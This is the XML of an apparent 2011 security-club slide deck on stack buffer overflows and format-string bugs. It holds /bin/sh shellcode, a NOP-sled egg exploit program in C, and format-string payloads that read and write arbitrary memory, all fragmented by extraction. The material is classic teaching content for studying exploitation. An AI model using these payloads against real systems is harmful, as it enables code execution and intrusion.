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9" r:id="rId2"/>
    <p:sldId id="262" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="266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32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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D108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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D108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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D108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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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0B083E-6D40-4195-B010-924E1900A6AF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8E8A1C-4456-4DE7-BB10-4826A0D10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6D0B083E-6D40-4195-B010-924E1900A6AF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AC8E8A1C-4456-4DE7-BB10-4826A0D10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D0B083E-6D40-4195-B010-924E1900A6AF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AC8E8A1C-4456-4DE7-BB10-4826A0D10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ypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.org/issues.html?id=14&amp;issue=49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819400"/>
            <a:ext cx="762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CrackChat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#2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Stack Overflows and Format Strings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Baking the Egg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04-21-2011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76200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Now for the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bytecode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shellcode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"\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xeb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\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"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"\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x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80"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"\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xb8\x01\x00\x00\x00\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xbb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\x00\x00\x00\x00\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xcd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\x80\xe8\xd1\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xff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xff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"\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xff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\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\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xec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\x5d\xc3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Problem: null bytes. Fix: substitutions.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Problem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instruction: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Substitute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with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 -------------------------------------------------------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movb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$0x0,0x7(%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xorl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eax,%eax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molv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$0x0,0xc(%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movb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%eax,0x7(%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movl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%eax,0xc(%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--------------------------------------------------------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movl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$0xb,%eax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movb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$0xb,%al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--------------------------------------------------------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movl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$0x1, %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xorl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ebx,%ebx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movl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$0x0, %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movl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ebx,%eax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	inc  %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--------------------------------------------------------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76200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Exploitation: it’s all math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Need to find where our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shellcode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begins. Three approaches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AutoNum type="arabicParenR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Guessing: no. we’re lazy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR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Brute force: try and try again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"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Shellcode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padding: much better odds, but requires a large buffer. Uses NOPS (0x90) or cyclic operations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bottom of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DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF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FFFF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FFFF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FFFF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top of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memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF  memory 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buffer    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sfp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ret   a     b     c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&lt;------   [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NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE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^ 		     |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|_____________________| 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top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of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				bottom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of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stack 					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stack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76200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define DEFAULT_OFFSET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DEFAULT_BUFFER_SIZE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512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NOP 0x90 char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shellcode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[] =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"\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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"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"\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x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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"\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x80\xe8\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xdc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xff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xff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xff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get_sp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(void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asm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%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esp,%eax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2296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main(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char *buff, *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long *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addr_ptr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offset=DEFAULT_OFFSET,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bsize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=DEFAULT_BUFFER_SIZE;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&gt; 1)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bsize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atoi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&gt; 2) offset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atoi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[2]);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(!(buff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bsize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 {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("Can't allocate memory.\n");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exit(0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 }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get_sp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- offset;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("Using address: 0x%x\n",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 buff;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addr_ptr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 (long *)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for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bsize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+=4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addr_ptr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++)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for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bsize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/2;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++) buff[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NOP;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 buff + ((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bsize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/2) -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shellcode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)/2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for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shellcode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++) *(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++)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shellcode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buff[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bsize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- 1] = '\0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buff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,"EGG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=",4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putenv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(buff);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system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("/bin/bash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838200"/>
            <a:ext cx="82296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Further reading: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Smashing the Stack for Fun and Profit,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Aelph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One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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.phrack.org/issues.html?id=14&amp;issue=49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Exploiting Format String Vulnerabilities, by team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teso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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf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838200"/>
            <a:ext cx="8229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Have a good summer.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-(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NSDate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*)agenda {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intro(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crackChat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freeZines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watch(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kevinPoulsen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finish(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formatString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bakeEgg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furtherReading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collectRequests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august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135868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 Strings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09600"/>
            <a:ext cx="7620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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="#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Format modifiers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(“here’s a number: %d”, num);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%d –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%u – unsigned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%x – hex version of %u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%s – char *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%n – (*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number of bytes written so far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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="#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Variable length parameter lists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(“Number %d has no address, number %d has: $08x\n”,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a, &amp;a);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---- stack top ----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&lt;&amp;a&gt;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&lt;a&gt;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---- stack bottom ----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09600"/>
            <a:ext cx="7620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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="#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Uses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Viewing the stack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stackpop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sequence):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(“%08x.%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08x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.%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08x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.%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08x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.%08x\n”);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Output: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40012980.080628c4.bffff7a4.00000005.08059c04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Viewing an arbitrary address (let’s say 0x08480110):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("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s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|");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Output: prints process memory starting at 0x08480110 until null byte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Writing to an arbitrary address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"\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xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%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n“);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09600"/>
            <a:ext cx="76200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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="#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Tricks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Controlling number of bytes written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unsigned char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[4];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(“%64u%n”, 7350,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*)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Result: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[0] = 0x40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unsigned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char canary[5];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unsigned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[4];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memset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’\x00’,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/*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0 * before */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(canary, "AAAA");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/*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 */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("%16u%n", 7350,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*) &amp;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[0]);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/*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*/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("%32u%n", 7350,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*) &amp;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/*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 */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("%64u%n", 7350,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*) &amp;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[2]);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/*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4 */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("%128u%n", 7350,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*) &amp;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[3]);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("%02x%02x%02x%02x\n",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[2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[3]);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("canary: %02x%02x%02x%02x\n", canary[0],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canary[1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], canary[2], canary[3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Output: 10204080 and canary = 0x00000041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135868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Baking the Egg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447800"/>
            <a:ext cx="39624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void function(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c)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char buffer1[5];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char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buffer2[10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ret;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ret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 buffer1 + 12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(*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ret) += 8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main()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x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function(1,2,3);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x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("%d\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n",x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200" dirty="0" smtClean="0"/>
              <a:t> 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8600" y="1447800"/>
            <a:ext cx="4648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0x8000490 &lt;main&gt;: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pushl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ebp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0x8000491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&lt;main+1&gt;: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movl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%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esp,%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ebp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0x8000493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&lt;main+3&gt;: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subl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$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0x4,%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esp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0x8000496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&lt;main+6&gt;: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movl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$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0x0,0xfffffffc(%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ebp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0x800049d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&lt;main+13&gt;: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pushl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0x3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0x800049f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&lt;main+15&gt;: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pushl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0x2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0x80004a1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&lt;main+17&gt;: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pushl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0x1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0x80004a3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&lt;main+19&gt;: call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0x8000470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&lt;function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0x80004a8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&lt;main+24&gt;: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addl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0xc,%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esp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0x80004ab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&lt;main+27&gt;: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movl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0x1,0xfffffffc(%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ebp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0x80004b2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&lt;main+34&gt;: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movl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0xfffffffc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(%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ebp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),%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0x80004b5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&lt;main+37&gt;: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pushl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%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x80004b6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&lt;main+38&gt;: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pushl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$0x80004f8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0x80004bb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&lt;main+43&gt;: call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0x8000378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0x80004c0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&lt;main+48&gt;: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addl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0x8,%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esp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0x80004c3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&lt;main+51&gt;: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movl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%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ebp,%esp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0x80004c5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&lt;main+53&gt;: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popl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%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ebp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0x80004c6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&lt;main+54&gt;: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ret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0x80004c7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&lt;main+55&gt;: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nop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76200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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="#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riting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shellcode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Simple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execve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program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main()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char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*name[2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name[0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"/bin/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name[1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NULL;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execve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(name[0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], name, NULL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Disassemble and extract important parts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movl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string_addr,string_addr_addr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movb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0x0,null_byte_addr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movl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0x0,null_addr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movl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$0xb,%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eax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movl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string_addr,%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ebx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leal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string_addr,%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ecx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leal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null_string,%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edx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$0x80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movl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$0x1, %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eax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movl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$0x0, %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ebx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$0x80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string goes here.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1584</TotalTime>
  <Words>1002</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>267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Metro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</dc:creator>
  <cp:lastModifiedBy>Chris</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-03-30T17:53:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-04-21T19:33:54Z</dcterms:modified>
</cp:coreProperties>
</file>